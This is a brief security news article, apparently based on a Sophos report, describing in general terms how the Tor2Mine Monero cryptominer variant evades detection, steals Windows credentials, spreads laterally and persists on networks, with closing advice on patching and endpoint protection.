Last Updated on 07/12/2021 by Riya
Cryptocurrencies have grown in prominence among consumers, however with the growing popularity cryptocurrency mining campaigns have also moved to the forefront of the danger scene. New TTP and malware variants are generated on a daily basis as crypto mining operations have shown to be lucrative for hackers.
Sophos discovered one, however, it’s more powerful and harmful than the original.The new Tor2Mine variant is a Monero miner that has been active dating back to 2019 and therefore can take leverage of massive worker device networks.
The authors seek to strengthen the miner to avoid detection and maintain durability on hacked networks arise. Tor2Mine removes anti-malware software, spreads the malware, and exploits a PowerShell script to acquire Windows credentials.
If Tor2Mine can attain administrator privileges, it installs executables as a service and seeks the network for more devices to infiltrate. If the miner cannot access the username and password, it can still execute operations as regular tasks without downloading anything.
More extremely hazardous vulnerabilities will get an opportunity once miners are active on a network. Tor2Mine also seems to be robust in comparison to its opponents. After it has developed resilience, it could only be removed using endpoint protection as well as other anti-malware solutions.
Because of its lateral movement capability, Tor2Mine would persist to infiltrate systems even though the C2 server fell down.Sophos claimed that Cryptominers have a slight possibility of infecting businesses that quickly repair flaws in web systems. Hence, as new risk emerges, businesses must keep up with the trend by adopting efficient cybersecurity solutions.